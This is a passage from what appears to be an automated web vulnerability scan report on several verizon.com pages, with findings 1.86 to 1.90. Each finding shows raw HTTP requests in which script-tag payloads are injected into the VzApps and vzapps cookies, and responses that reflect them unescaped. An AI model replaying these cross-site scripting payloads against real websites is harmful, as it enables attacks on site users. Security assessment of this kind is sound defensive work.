Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX790ec<script>alert(1)</script>1fb2881387e; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67985
Expires: Sat, 20 Nov 2010 03:15:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:00 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX790ec<script>alert(1)</script>1fb2881387e; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX790EC<SCRIPT>ALERT(1)</SCRIPT>1FB2881387E </DIV>
...[SNIP]...

1.86. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e301'><script>alert(1)</script>715a473175c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX8e301'><script>alert(1)</script>715a473175c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67990
Expires: Sat, 20 Nov 2010 03:14:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8e301'><script>alert(1)</script>715a473175c; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8E301'><SCRIPT>ALERT(1)</SCRIPT>715A473175C ' />
...[SNIP]...

1.87. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd6'><script>alert(1)</script>c865fc14b77 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX1bbd6'><script>alert(1)</script>c865fc14b77; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68022
Expires: Sat, 20 Nov 2010 03:14:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:25 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1bbd6'><script>alert(1)</script>c865fc14b77; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1BBD6'><SCRIPT>ALERT(1)</SCRIPT>C865FC14B77 ' />
...[SNIP]...

1.88. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload e9fda<script>alert(1)</script>0b8d7546ca4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXe9fda<script>alert(1)</script>0b8d7546ca4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68018
Expires: Sat, 20 Nov 2010 03:14:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe9fda<script>alert(1)</script>0b8d7546ca4; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE9FDA<SCRIPT>ALERT(1)</SCRIPT>0B8D7546CA4 </DIV>
...[SNIP]...

1.89. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload d477a<script>alert(1)</script>4e4f8e6dbe8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXd477a<script>alert(1)</script>4e4f8e6dbe8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68018
Expires: Sat, 20 Nov 2010 00:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXd477a<script>alert(1)</script>4e4f8e6dbe8; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXD477A<SCRIPT>ALERT(1)</SCRIPT>4E4F8E6DBE8 </DIV>
...[SNIP]...

1.90. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1327c'><script>alert(1)</script>eb0b45a8082 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
